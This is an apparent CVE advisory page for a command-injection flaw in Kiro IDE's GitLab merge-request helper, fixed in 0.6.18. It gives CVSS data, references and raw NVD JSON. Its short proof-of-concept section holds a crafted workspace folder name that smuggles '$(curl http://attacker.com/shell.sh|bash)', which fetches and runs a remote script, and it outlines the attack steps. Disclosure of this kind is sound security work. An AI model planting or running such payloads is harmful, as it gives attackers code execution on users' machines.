CVE-2026-0830

Description

Processing specially crafted workspace folder names could allow for arbitrary command injection in the Kiro GitLab Merge-Request helper in Kiro IDE before version 0.6.18 when opening maliciously crafted workspaces. To mitigate, users should update to the latest version.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:amazon:kiro_ide:*:*:*:*:*:*:*:* - VULNERABLE

Kiro IDE < 0.6.18

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-0830 PoC - Malicious Workspace Folder Name
# This PoC demonstrates command injection via workspace folder name
# Attack Vector: Crafted workspace folder name containing shell commands

# Example malicious workspace folder name:
malicious_folder_name = "test_workspace;$(curl http://attacker.com/shell.sh|bash)"

# Or using backticks:
# malicious_folder_name = "test_workspace`curl http://attacker.com/shell.sh|bash`"

# When Kiro IDE processes this workspace, the command after ; or $() will be executed
# The GitLab Merge-Request helper processes the folder name without sanitization

# Exploitation scenario:
# 1. Attacker creates a GitLab repository with malicious workspace configuration
# 2. Repository contains workspace folder with crafted name
# 3. Victim opens repository in Kiro IDE
# 4. IDE parses workspace folder name
# 5. Embedded commands are executed with user's privileges

# Mitigation: Update to Kiro IDE >= 0.6.18

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0830
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0830
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0830/
[4] VulDB https://vuldb.com/cve/CVE-2026-0830
[5] https://aws.amazon.com/security/security-bulletins/2026-001-AWS/
[6] https://kiro.dev/changelog/spec-correctness-and-cli/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0830", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-01-09T21:16:14.127", "lastModified": "2026-04-28T17:41:17.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Processing specially crafted workspace folder names could allow for arbitrary command injection in the Kiro GitLab Merge-Request helper in Kiro IDE before version 0.6.18 when opening maliciously crafted workspaces.\n\nTo mitigate, users should update to the latest version."}, {"lang": "es", "value": "El procesamiento de nombres de carpetas de espacio de trabajo especialmente diseñados podría permitir la inyección de comandos arbitraria en el asistente de solicitudes de fusión de Kiro GitLab en Kiro IDE antes de la versión 0.6.18 al abrir espacios de trabajo maliciosamente diseñados.\n\nPara mitigar, los usuarios deberían actualizar a la última versión."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:kiro_ide:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.6.18", "matchCriteriaId": "80D05466-68B7-463E-9356-249E5A6124EE"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-001-AWS/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://kiro.dev/changelog/spec-correctness-and-cli/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes"]}]}}